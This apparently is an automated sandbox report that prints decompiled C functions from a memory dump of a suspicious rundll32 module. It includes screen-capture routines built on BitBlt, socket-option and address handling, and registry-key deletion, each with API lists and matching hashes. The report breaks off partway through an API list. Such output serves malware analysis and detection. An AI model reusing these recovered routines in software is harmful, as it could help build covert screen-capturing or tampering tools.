                                                            					if(_t27 < 8) {
                                                            						_t37 = _t58;
                                                            					} else {
                                                            						_t37 =  *_t58;
                                                            					}
                                                            					_t56 = CreateFileW(_t37, 0x80000000, 1, 0, 3, 0x80, 0);
                                                            					if(_t56 != 0xffffffff) {
                                                            						_t44 = GetFileSize(_t56,  &_v8);
                                                            						CloseHandle(_t56);
                                                            						goto L12;
                                                            					} else {
                                                            						return 0;
                                                            					}
                                                            				}
                                                            			}
















                                                            0x04634fb8
                                                            0x04634fc1
                                                            0x04634fc4
                                                            0x04634fc6
                                                            0x04634fc9
                                                            0x04634fcf
                                                            0x04634fd1
                                                            0x04634fd5
                                                            0x04634fd5
                                                            0x04634fda
                                                            0x04634fdd
                                                            0x04634fe3
                                                            0x04634fe9
                                                            0x04634fe5
                                                            0x04634fe5
                                                            0x04634fe5
                                                            0x04634ff1
                                                            0x0463503d
                                                            0x04635040
                                                            0x0463504a
                                                            0x04635053
                                                            0x04635055
                                                            0x0463505b
                                                            0x0463505e
                                                            0x04635065
                                                            0x04635068
                                                            0x0463506a
                                                            0x0463506a
                                                            0x04635074
                                                            0x04635079
                                                            0x04635087
                                                            0x04635089
                                                            0x0463508c
                                                            0x0463508d
                                                            0x04635095
                                                            0x046350a3
                                                            0x04634ff3
                                                            0x04634ff6
                                                            0x04634ffc
                                                            0x04634ff8
                                                            0x04634ff8
                                                            0x04634ff8
                                                            0x04635017
                                                            0x0463501c
                                                            0x04635035
                                                            0x04635037
                                                            0x00000000
                                                            0x0463501e
                                                            0x04635026
                                                            0x04635026
                                                            0x0463501c

                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000007,?,?,?), ref: 04635011
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 0463502E
                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 04635037
                                                            • LocalAlloc.KERNEL32(00000040,?,00000007,?,?,?), ref: 0463504D
                                                            • LocalFree.KERNEL32(00000000,00000000,?,0000003F,?,?,?), ref: 04635095
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileLocal$AllocCloseCreateFreeHandleSize
                                                            • String ID:
                                                            • API String ID: 1503672127-0
                                                            • Opcode ID: fc0b4b8250a78ea7e42d5da588d26ae6225233a13de3c4dba402d6b106020959
                                                            • Instruction ID: 9c74e031511cdba8018622137dca057410a60cf4fdc9120ac4f500fcd79db7dd
                                                            • Opcode Fuzzy Hash: fc0b4b8250a78ea7e42d5da588d26ae6225233a13de3c4dba402d6b106020959
                                                            • Instruction Fuzzy Hash: 4331A131600204ABD724DFA8DC84F6AB7F9EB85722F10462DF506D7290EB35BD55CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 94%
                                                            			E046428C0(signed short __ecx, signed int _a4, signed int _a8, signed int _a12) {
                                                            				signed short _v8;
                                                            				void* __esi;
                                                            				signed int _t28;
                                                            				struct tagBITMAPINFO* _t30;
                                                            				signed int _t44;
                                                            				struct tagBITMAPINFO* _t51;
                                                            				signed int _t54;
                                                            				unsigned int _t58;
                                                            				signed int _t59;
                                                            				signed char* _t60;
                                                            				struct HDC__* _t64;
                                                            				signed short _t66;
                                                            				void* _t68;
                                                            				signed int _t69;
                                                            
                                                            				_t53 = __ecx;
                                                            				_push(__ecx);
                                                            				_t66 = _a4;
                                                            				_v8 = __ecx;
                                                            				_t72 = _t66 - 8;
                                                            				if(_t66 > 8) {
                                                            					_t28 = 0;
                                                            					__eflags = 0;
                                                            				} else {
                                                            					_t53 = _t66;
                                                            					_t28 = 1 << _t66;
                                                            				}
                                                            				_a4 = _t28;
                                                            				_push(0x28 + _t28 * 4);
                                                            				_t30 = L04655B55(_t53, _t66, _t72);
                                                            				_t54 = _a8;
                                                            				_t51 = _t30;
                                                            				_t59 = _a12;
                                                            				_t51->bmiHeader = 0x28;
                                                            				_t51->bmiHeader.biWidth = _t54;
                                                            				_t51->bmiHeader.biHeight = _t59;
                                                            				_t51->bmiHeader.biPlanes = 1;
                                                            				_t51->bmiHeader.biBitCount = _t66;
                                                            				_t51->bmiHeader.biCompression = 0;
                                                            				_t51->bmiHeader.biXPelsPerMeter = 0;
                                                            				_t51->bmiHeader.biYPelsPerMeter = 0;
                                                            				_t51->bmiHeader.biClrUsed = 0;
                                                            				_t51->bmiHeader.biClrImportant = 0;
                                                            				_t51->bmiHeader.biSizeImage = ((_t66 & 0x0000ffff) * _t54 + 0x0000001f >> 0x00000003 & 0xfffffffc) * _t59;
                                                            				if(_t66 < 0x10) {
                                                            					_t64 = GetDC(0);
                                                            					_t68 = CreateCompatibleBitmap(_t64, 1, 1);
                                                            					GetDIBits(_t64, _t68, 0, 0, 0, _t51, 0);
                                                            					ReleaseDC(0, _t64);
                                                            					DeleteObject(_t68);
                                                            					if( *((char*)(_v8 + 0xc)) != 0) {
                                                            						_t69 = _a4;
                                                            						if(_t69 > 0) {
                                                            							_t21 =  &(_t51->bmiColors[0]); // 0x29
                                                            							_t60 = _t21;
                                                            							do {
                                                            								_t44 =  *_t60 & 0x000000ff;
                                                            								_t60 =  &(_t60[4]);
                                                            								_t58 = _t44 * 0x259 + ( *(_t60 - 3) & 0x000000ff) * 0x132 + ( *(_t60 - 5) & 0x000000ff) * 0x75 >> 0xa;
                                                            								 *(_t60 - 5) = _t58;
                                                            								 *(_t60 - 4) = _t58;
                                                            								 *(_t60 - 3) = _t58;
                                                            								_t69 = _t69 - 1;
                                                            							} while (_t69 != 0);
                                                            						}
                                                            					}
                                                            				}
                                                            				return _t51;
                                                            			}

















                                                            0x046428c0
                                                            0x046428c3
                                                            0x046428c6
                                                            0x046428c9
                                                            0x046428d2
                                                            0x046428d5
                                                            0x046428df
                                                            0x046428df
                                                            0x046428d7
                                                            0x046428d9
                                                            0x046428db
                                                            0x046428db
                                                            0x046428e1
                                                            0x046428eb
                                                            0x046428ec
                                                            0x046428f1
                                                            0x046428f4
                                                            0x046428f6
                                                            0x04642902
                                                            0x04642908
                                                            0x0464290b
                                                            0x0464290e
                                                            0x04642915
                                                            0x0464291f
                                                            0x04642929
                                                            0x04642930
                                                            0x04642937
                                                            0x0464293e
                                                            0x04642945
                                                            0x0464294b
                                                            0x0464295b
                                                            0x0464296f
                                                            0x04642973
                                                            0x0464297c
                                                            0x04642983
                                                            0x04642990
                                                            0x04642992
                                                            0x04642997
                                                            0x04642999
                                                            0x04642999
                                                            0x046429a0
                                                            0x046429a0
                                                            0x046429a3
                                                            0x046429c1
                                                            0x046429c4
                                                            0x046429c7
                                                            0x046429ca
                                                            0x046429cd
                                                            0x046429cd
                                                            0x046429a0
                                                            0x04642997
                                                            0x04642990
                                                            0x046429da

                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 04642953
                                                            • CreateCompatibleBitmap.GDI32(00000000,00000001,00000001), ref: 04642960
                                                            • GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04642973
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0464297C
                                                            • DeleteObject.GDI32(00000000), ref: 04642983
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: BitmapBitsCompatibleCreateDeleteObjectRelease
                                                            • String ID:
                                                            • API String ID: 3052192651-0
                                                            • Opcode ID: 23e00ef462ece27f86bb72b11ad60dc7fae9889c02e0dba34a0001f9eb055b45
                                                            • Instruction ID: 9b96ecca2699273e9908c59c7bbf5a37b498140f401652f8bb01ca860b3ffd2b
                                                            • Opcode Fuzzy Hash: 23e00ef462ece27f86bb72b11ad60dc7fae9889c02e0dba34a0001f9eb055b45
                                                            • Instruction Fuzzy Hash: B831CA72601210AFEB048F55DC99759FFA4EF55310F158299F805CF2C2E778D944DB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E04642A10(intOrPtr __ecx, int* _a4) {
                                                            				intOrPtr _v8;
                                                            				void* _v12;
                                                            				int _v16;
                                                            				intOrPtr* _t46;
                                                            				intOrPtr _t62;
                                                            				int _t72;
                                                            				intOrPtr _t73;
                                                            				void* _t81;
                                                            				int _t83;
                                                            				intOrPtr _t85;
                                                            
                                                            				_t46 = _a4;
                                                            				_v12 = 0;
                                                            				_t3 = _t46 + 8; // 0x8a0004c2
                                                            				_t4 = _t46 + 0xc; // 0x5e5fff45
                                                            				_t83 =  *_t3 -  *_t46;
                                                            				_t5 = _t46 + 4; // 0x5de58b5b
                                                            				_t72 =  *_t4 -  *_t5;
                                                            				 *(__ecx + 0x64)->bmiHeader.biWidth = _t83;
                                                            				_v8 = __ecx;
                                                            				_v16 = _t83;
                                                            				 *(__ecx + 0x64)->bmiHeader.biHeight = _t72;
                                                            				 *(__ecx + 0x64)->bmiHeader.biSizeImage = (( *(__ecx + 0x64)->bmiHeader.biBitCount & 0x0000ffff) *  *(__ecx + 0x64)->bmiHeader.biWidth + 0x0000001f >> 0x00000003 & 0xfffffffc) *  *(__ecx + 0x64)->bmiHeader.biHeight;
                                                            				_t81 = CreateDIBSection( *(__ecx + 0x3c),  *(__ecx + 0x64), 0,  &_v12, 0, 0);
                                                            				SelectObject( *(_v8 + 0x48), _t81);
                                                            				BitBlt( *(_v8 + 0x44),  *_a4, _a4[1], _t83, _t72,  *(_v8 + 0x3c),  *_a4, _a4[1],  *(_v8 + 0x10));
                                                            				_t62 = _v8;
                                                            				_t73 = _t62;
                                                            				BitBlt( *(_t73 + 0x48), 0, 0, _v16, _t72,  *(_t62 + 0x44),  *_a4, _a4[1], 0xcc0020);
                                                            				asm("movups xmm0, [edx]");
                                                            				asm("movups [eax], xmm0");
                                                            				 *((intOrPtr*)(_t73 + 0x18)) =  *((intOrPtr*)(_t73 + 0x18)) + 0x10;
                                                            				_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x64)) + 0x14));
                                                            				E0465E060( *((intOrPtr*)(_t73 + 0x14)) +  *((intOrPtr*)(_t73 + 0x18)), _v12, _t85);
                                                            				 *((intOrPtr*)(_t73 + 0x18)) =  *((intOrPtr*)(_t73 + 0x18)) + _t85;
                                                            				return DeleteObject(_t81);
                                                            			}













                                                            0x04642a16
                                                            0x04642a1d
                                                            0x04642a24
                                                            0x04642a27
                                                            0x04642a2a
                                                            0x04642a2c
                                                            0x04642a2c
                                                            0x04642a37
                                                            0x04642a3d
                                                            0x04642a40
                                                            0x04642a43
                                                            0x04642a5e
                                                            0x04642a73
                                                            0x04642a7c
                                                            0x04642aa2
                                                            0x04642ab1
                                                            0x04642abb
                                                            0x04642ac4
                                                            0x04642acf
                                                            0x04642ad2
                                                            0x04642ad8
                                                            0x04642adc
                                                            0x04642aea
                                                            0x04642af2
                                                            0x04642b02

                                                            APIs
                                                            • CreateDIBSection.GDI32(00000000,?,00000000,00000000,00000000,00000000), ref: 04642A6D
                                                            • SelectObject.GDI32(?,00000000), ref: 04642A7C
                                                            • BitBlt.GDI32(?,?,?,8A0004C2,5DE58B5B,?,?,?,?), ref: 04642AA2
                                                            • BitBlt.GDI32(?,00000000,00000000,?,5DE58B5B,?,00000000,?,00CC0020), ref: 04642AC4
                                                            • DeleteObject.GDI32(00000000), ref: 04642AF6
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Object$CreateDeleteSectionSelect
                                                            • String ID:
                                                            • API String ID: 3188413882-0
                                                            • Opcode ID: 4f3238ace2a8b6a2507b7af1489a48db2bdbf1702015211358e620b9378012cb
                                                            • Instruction ID: 466b819fe531e757a0acbbc1c2e413ce1535fd8886b8acbec398e49ac7a3f064
                                                            • Opcode Fuzzy Hash: 4f3238ace2a8b6a2507b7af1489a48db2bdbf1702015211358e620b9378012cb
                                                            • Instruction Fuzzy Hash: 30311676900204EFDB04CF98DD85E9ABBB9FF49310F158195FA049B262D771ED90DB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0464D2D0(signed short* __ecx, short* __edx, WCHAR* _a4, signed int* _a8, signed int _a12) {
                                                            				signed int _t14;
                                                            				signed int _t19;
                                                            				WCHAR* _t20;
                                                            				signed int _t31;
                                                            				signed int* _t35;
                                                            				WCHAR* _t38;
                                                            				void* _t39;
                                                            				signed int _t40;
                                                            
                                                            				 *__edx =  *__ecx;
                                                            				_t14 = __ecx[1] & 0x0000ffff;
                                                            				__imp__#15(_t14);
                                                            				_t38 = _a4;
                                                            				 *_a12 = _t14;
                                                            				_t16 =  !=  ? 0x1c : 0x10;
                                                            				__imp__WSAAddressToStringW(__ecx, 0x10, 0, _t38, _a8);
                                                            				_t45 =  !=  ? 0x1c : 0x10;
                                                            				if(( !=  ? 0x1c : 0x10) != 0) {
                                                            					return 0;
                                                            				} else {
                                                            					_t40 =  *__ecx & 0x0000ffff;
                                                            					_a12 = _t40;
                                                            					_t19 = __ecx[1] & 0x0000ffff;
                                                            					__imp__#15(_t19, _t39);
                                                            					_t31 = 0 | _t19 != 0x00000000;
                                                            					if(_t40 == 0x17) {
                                                            						if(_t31 == 0) {
                                                            							_t20 = StrChrW(_t38, 0x25);
                                                            							goto L7;
                                                            						} else {
                                                            							_t20 = StrPBrkW(_t38, L"]%");
                                                            						}
                                                            						goto L8;
                                                            					} else {
                                                            						if(_t31 == 0) {
                                                            							L10:
                                                            							_t35 = _a8;
                                                            						} else {
                                                            							_t20 = StrChrW(_t38, 0x3a);
                                                            							L7:
                                                            							L8:
                                                            							if(_t20 == 0) {
                                                            								goto L10;
                                                            							} else {
                                                            								 *_t20 = 0;
                                                            								_t35 = _a8;
                                                            								 *_t35 = _t20 - _t38 >> 1;
                                                            							}
                                                            						}
                                                            					}
                                                            					if(_a12 != 0x17 || _t31 == 0) {
                                                            						 *_t35 =  *_t35 + 1;
                                                            						return 1;
                                                            					} else {
                                                            						E0465E060(_t38,  &(_t38[1]),  *_t35 +  *_t35);
                                                            						return 1;
                                                            					}
                                                            				}
                                                            			}











                                                            0x0464d2da
                                                            0x0464d2dd
                                                            0x0464d2e2
                                                            0x0464d2ee
                                                            0x0464d2f2
                                                            0x0464d305
                                                            0x0464d30a
                                                            0x0464d310
                                                            0x0464d312
                                                            0x0464d3aa
                                                            0x0464d318
                                                            0x0464d319
                                                            0x0464d31e
                                                            0x0464d321
                                                            0x0464d326
                                                            0x0464d331
                                                            0x0464d338
                                                            0x0464d344
                                                            0x0464d357
                                                            0x00000000
                                                            0x0464d346
                                                            0x0464d34c
                                                            0x0464d34c
                                                            0x00000000
                                                            0x0464d33a
                                                            0x0464d33c
                                                            0x0464d371
                                                            0x0464d371
                                                            0x0464d33e
                                                            0x0464d357
                                                            0x0464d356
                                                            0x0464d35d
                                                            0x0464d35f
                                                            0x00000000
                                                            0x0464d361
                                                            0x0464d363
                                                            0x0464d368
                                                            0x0464d36d
                                                            0x0464d36d
                                                            0x0464d35f
                                                            0x0464d33c
                                                            0x0464d379
                                                            0x0464d39a
                                                            0x0464d3a4
                                                            0x0464d37f
                                                            0x0464d389
                                                            0x0464d399
                                                            0x0464d399
                                                            0x0464d379

                                                            APIs
                                                            • htons.WS2_32(?), ref: 0464D2E2
                                                            • WSAAddressToStringW.WS2_32(?,00000010,00000000,?,?), ref: 0464D30A
                                                            • htons.WS2_32(?), ref: 0464D326
                                                            • StrPBrkW.SHLWAPI(?,0467F834,?,00000010,00000000,?,?), ref: 0464D34C
                                                            • StrChrW.SHLWAPI(?,00000025,?,00000010,00000000,?,?), ref: 0464D357
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: htons$AddressString
                                                            • String ID:
                                                            • API String ID: 2368566317-0
                                                            • Opcode ID: 02cb54e8cc30de8b43992d2744d452d501b86e615f6a584909e2c8d74f239e91
                                                            • Instruction ID: db6d4a743d8e11f7a21552d9f00de3d29b4aa559162cf0a478b987f436007582
                                                            • Opcode Fuzzy Hash: 02cb54e8cc30de8b43992d2744d452d501b86e615f6a584909e2c8d74f239e91
                                                            • Instruction Fuzzy Hash: 1721A136700205EBEF155F69DC88A7A73ACEF9A714F04406AF909CA250FBB9EC41D760
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E04647A90(intOrPtr* __ecx, intOrPtr _a4) {
                                                            				void* _v12;
                                                            				char _v16;
                                                            				intOrPtr _v20;
                                                            				char _v24;
                                                            				void* _t28;
                                                            				void* _t30;
                                                            				struct _SECURITY_ATTRIBUTES* _t33;
                                                            				intOrPtr* _t43;
                                                            				intOrPtr _t44;
                                                            				intOrPtr* _t45;
                                                            				intOrPtr _t46;
                                                            
                                                            				_t46 = _a4;
                                                            				_t45 = __ecx;
                                                            				 *__ecx = 0x467e8b0;
                                                            				 *((intOrPtr*)(__ecx + 4)) = _t46;
                                                            				 *((intOrPtr*)(_t46 + 0x38)) = __ecx;
                                                            				_t28 = CreateEventW(0, 1, 0, 0);
                                                            				_t42 = _t45 + 0x1c;
                                                            				 *(_t45 + 8) = _t28;
                                                            				 *_t45 = 0x467f17c;
                                                            				L04632330(_t45 + 0x1c);
                                                            				 *(_t45 + 0x10) = 0;
                                                            				 *(_t45 + 0x14) = 0;
                                                            				 *(_t45 + 0xe4) = 0;
                                                            				 *((char*)(_t45 + 0xec)) = 1;
                                                            				 *((intOrPtr*)(_t45 + 0xe8)) = 0x3f;
                                                            				 *(_t45 + 0xf0) = 0;
                                                            				 *(_t45 + 0xf4) = 0;
                                                            				_t30 = CreateEventW(0, 0, 0, 0);
                                                            				 *(_t45 + 0x18) = _t30;
                                                            				if(_t30 != 0) {
                                                            					 *(_t45 + 0xc) = 1;
                                                            					_v24 = E04648040;
                                                            					_v20 = _t45;
                                                            					_v16 = 1;
                                                            					_v12 = CreateEventW(0, 0, 0, 0);
                                                            					_t33 = E0465F897(_t42, 0, 0, E04645400,  &_v24, 0, 0);
                                                            					WaitForSingleObject(_v12, 0xffffffff);
                                                            					CloseHandle(_v12);
                                                            					 *(_t45 + 0xe4) = _t33;
                                                            					goto L6;
                                                            				} else {
                                                            					 *(_t45 + 0xc) = _t30;
                                                            					_t15 = _t46 + 0x20; // 0x0
                                                            					_t43 =  *_t15;
                                                            					 *(_t46 + 0x44) = 1;
                                                            					if(_t43 != 0) {
                                                            						L4:
                                                            						 *((intOrPtr*)( *_t43 + 4))();
                                                            						return _t45;
                                                            					} else {
                                                            						_t17 = _t46 + 0x24; // 0x0
                                                            						_t44 =  *_t17;
                                                            						if(_t44 == 0) {
                                                            							L6:
                                                            							return _t45;
                                                            						} else {
                                                            							_t43 = _t44 + 4;
                                                            							goto L4;
                                                            						}
                                                            					}
                                                            				}
                                                            			}














                                                            0x04647a9e
                                                            0x04647aa4
                                                            0x04647aac
                                                            0x04647ab2
                                                            0x04647ab5
                                                            0x04647ab8
                                                            0x04647aba
                                                            0x04647abd
                                                            0x04647ac0
                                                            0x04647ac6
                                                            0x04647ad3
                                                            0x04647ada
                                                            0x04647ae1
                                                            0x04647aeb
                                                            0x04647af2
                                                            0x04647afc
                                                            0x04647b06
                                                            0x04647b10
                                                            0x04647b12
                                                            0x04647b17
                                                            0x04647b4c
                                                            0x04647b53
                                                            0x04647b5a
                                                            0x04647b5d
                                                            0x04647b67
                                                            0x04647b77
                                                            0x04647b86
                                                            0x04647b8f
                                                            0x04647b95
                                                            0x00000000
                                                            0x04647b19
                                                            0x04647b19
                                                            0x04647b1c
                                                            0x04647b1c
                                                            0x04647b1f
                                                            0x04647b28
                                                            0x04647b34
                                                            0x04647b36
                                                            0x04647b41
                                                            0x04647b2a
                                                            0x04647b2a
                                                            0x04647b2a
                                                            0x04647b2f
                                                            0x04647b9b
                                                            0x04647ba3
                                                            0x04647b31
                                                            0x04647b31
                                                            0x00000000
                                                            0x04647b31
                                                            0x04647b2f
                                                            0x04647b28

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,04639782,046878D8,046878D8,00000000), ref: 04647AB8
                                                              • Part of subcall function 04632330: CoInitialize.OLE32(00000000), ref: 0463239B
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,04639782,046878D8,046878D8,00000000), ref: 04647B10
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 04647B61
                                                            • WaitForSingleObject.KERNEL32(046878D8,000000FF), ref: 04647B86
                                                            • CloseHandle.KERNEL32(046878D8), ref: 04647B8F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateEvent$CloseHandleInitializeObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 3162378676-0
                                                            • Opcode ID: d9e34affa871038aa6799721a483d9f1a92ec6beca9c9fbe1386126487b7abed
                                                            • Instruction ID: 23745ce7b951a87e28018cdeeab809151eb8c1bee1534ee2d2e7a55245673462
                                                            • Opcode Fuzzy Hash: d9e34affa871038aa6799721a483d9f1a92ec6beca9c9fbe1386126487b7abed
                                                            • Instruction Fuzzy Hash: 8631ABB1740706ABE714CF55CC45BAAFBA0FB54715F10421AE619AB6C0E7B2B814CBD4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 19%
                                                            			E0464D490(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				signed int _t12;
                                                            				char* _t22;
                                                            				intOrPtr* _t42;
                                                            				intOrPtr* _t43;
                                                            				signed int _t44;
                                                            
                                                            				_t12 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t12 ^ _t44;
                                                            				_v16 = 1;
                                                            				_v12 = 0;
                                                            				_t29 = __ecx;
                                                            				if(__edx != 0) {
                                                            					if(__edx != 1) {
                                                            						if(__edx != 2) {
                                                            							SetLastError(0x57);
                                                            							return E04655AFE(_v8 ^ _t44);
                                                            						} else {
                                                            							_t42 = __imp__#21;
                                                            							 *_t42(__ecx, 0xffff, 0xfffffffb,  &_v12, 4);
                                                            							 *_t42(0xffff, 4,  &_v16, 4);
                                                            							return E04655AFE(_v8 ^ _t44, __ecx);
                                                            						}
                                                            					} else {
                                                            						_t22 =  &_v12;
                                                            						goto L4;
                                                            					}
                                                            				} else {
                                                            					_t22 =  &_v16;
                                                            					L4:
                                                            					_t43 = __imp__#21;
                                                            					 *_t43(_t29, 0xffff, 0xfffffffb, _t22, 4);
                                                            					 *_t43(0xffff, 4,  &_v12, 4);
                                                            					return E04655AFE(_v8 ^ _t44, _t29);
                                                            				}
                                                            			}











                                                            0x0464d496
                                                            0x0464d49d
                                                            0x0464d4a0
                                                            0x0464d4a7
                                                            0x0464d4af
                                                            0x0464d4b5
                                                            0x0464d4bf
                                                            0x0464d4ff
                                                            0x0464d53e
                                                            0x0464d557
                                                            0x0464d501
                                                            0x0464d501
                                                            0x0464d515
                                                            0x0464d527
                                                            0x0464d53b
                                                            0x0464d53b
                                                            0x0464d4c1
                                                            0x0464d4c1
                                                            0x00000000
                                                            0x0464d4c1
                                                            0x0464d4b7
                                                            0x0464d4b7
                                                            0x0464d4c4
                                                            0x0464d4c4
                                                            0x0464d4d5
                                                            0x0464d4e7
                                                            0x0464d4fb
                                                            0x0464d4fb

                                                            APIs
                                                            • setsockopt.WS2_32(?,0000FFFF,000000FB,00000000,00000004), ref: 0464D4D5
                                                            • setsockopt.WS2_32(?,0000FFFF,00000004,00000000,00000004), ref: 0464D4E7
                                                            • setsockopt.WS2_32(?,0000FFFF,000000FB,00000000,00000004), ref: 0464D515
                                                            • setsockopt.WS2_32(?,0000FFFF,00000004,00000001,00000004), ref: 0464D527
                                                            • SetLastError.KERNEL32(00000057), ref: 0464D53E
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: setsockopt$ErrorLast
                                                            • String ID:
                                                            • API String ID: 1564866530-0
                                                            • Opcode ID: 4b15b3df0400fbd14b35ba7f40b63bdf0c435a04b7360d86bd7cc0672761fe9d
                                                            • Instruction ID: 0de93a9c8b2b0fdfcbd735d8c1fb016ee218239ecc59b755aa0108bc957fcca7
                                                            • Opcode Fuzzy Hash: 4b15b3df0400fbd14b35ba7f40b63bdf0c435a04b7360d86bd7cc0672761fe9d
                                                            • Instruction Fuzzy Hash: 7A21C676B0420E7AEB10DAA49C81FBE7768DF84735F10027AEB05A62C5EE7569088B50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 57%
                                                            			E046411E0(void* __ebx, intOrPtr __ecx, void* _a4, void* _a8) {
                                                            				intOrPtr* _v8;
                                                            				long _v12;
                                                            				intOrPtr _v16;
                                                            				void* _v20;
                                                            				intOrPtr* _v24;
                                                            				char _v28;
                                                            				char _t29;
                                                            				void* _t32;
                                                            				long _t33;
                                                            				void* _t45;
                                                            				void* _t46;
                                                            				char* _t49;
                                                            				intOrPtr* _t53;
                                                            				short* _t55;
                                                            				void* _t56;
                                                            				int _t57;
                                                            
                                                            				_t45 = __ebx;
                                                            				_t56 = _a8;
                                                            				_t53 = _a4 + 1;
                                                            				_v16 = __ecx;
                                                            				_v24 = _t53;
                                                            				_v20 = 0;
                                                            				_t29 = _t56 - 1 + _t53;
                                                            				_v28 = _t29;
                                                            				if(_t29 - _t53 >= 4) {
                                                            					_a8 =  *_t53;
                                                            					_v24 = _t53 + 4;
                                                            				} else {
                                                            					_v20 = 1;
                                                            					_a8 = 0;
                                                            				}
                                                            				_t49 =  &_v28;
                                                            				_t32 = E04640D20(_t49);
                                                            				_t55 = _t32;
                                                            				if(_v20 == 0) {
                                                            					_push(_t45);
                                                            					_t33 = _t56 + 4;
                                                            					_v12 = _t33;
                                                            					_t46 = LocalAlloc(0x40, _t33);
                                                            					E0465E060(_t46, _a4, _t56);
                                                            					_v8 = _t46 + _t56;
                                                            					_t57 = 0;
                                                            					_a4 = 0;
                                                            					if(RegOpenKeyExW(_a8, _t55, 0, 0x20106,  &_a4) == 0) {
                                                            						SHDeleteKeyW(_a4, 0x467c5d0);
                                                            						asm("sbb esi, esi");
                                                            						_t57 = 1;
                                                            						RegCloseKey(_a4);
                                                            					}
                                                            					_push(_t49);
                                                            					_push(0x3f);
                                                            					_push(_v12);
                                                            					 *_v8 = _t57;
                                                            					_push(_t46);
                                                            					E04631C60( *((intOrPtr*)(_v16 + 4)));
                                                            					_t32 = LocalFree(_t46);
                                                            					if(_t55 != 0) {
                                                            						return L04655B0F(_t55);
                                                            					}
                                                            				}
                                                            				return _t32;
                                                            			}



















                                                            0x046411e0
                                                            0x046411ea
                                                            0x046411ed
                                                            0x046411ef
                                                            0x046411f2
                                                            0x046411f8
                                                            0x046411ff
                                                            0x04641201
                                                            0x04641209
                                                            0x04641220
                                                            0x04641223
                                                            0x0464120b
                                                            0x0464120b
                                                            0x04641212
                                                            0x04641212
                                                            0x04641226
                                                            0x04641229
                                                            0x04641232
                                                            0x04641234
                                                            0x0464123a
                                                            0x0464123b
                                                            0x04641241
                                                            0x0464124e
                                                            0x04641251
                                                            0x0464125c
                                                            0x0464125f
                                                            0x04641264
                                                            0x0464127a
                                                            0x04641284
                                                            0x0464128f
                                                            0x04641291
                                                            0x04641292
                                                            0x04641292
                                                            0x0464129b
                                                            0x0464129f
                                                            0x046412a1
                                                            0x046412a4
                                                            0x046412a9
                                                            0x046412aa
                                                            0x046412b0
                                                            0x046412b9
                                                            0x00000000
                                                            0x046412c1
                                                            0x046412b9
                                                            0x046412c9

                                                            APIs
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 04641244
                                                            • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00020106,?), ref: 04641272
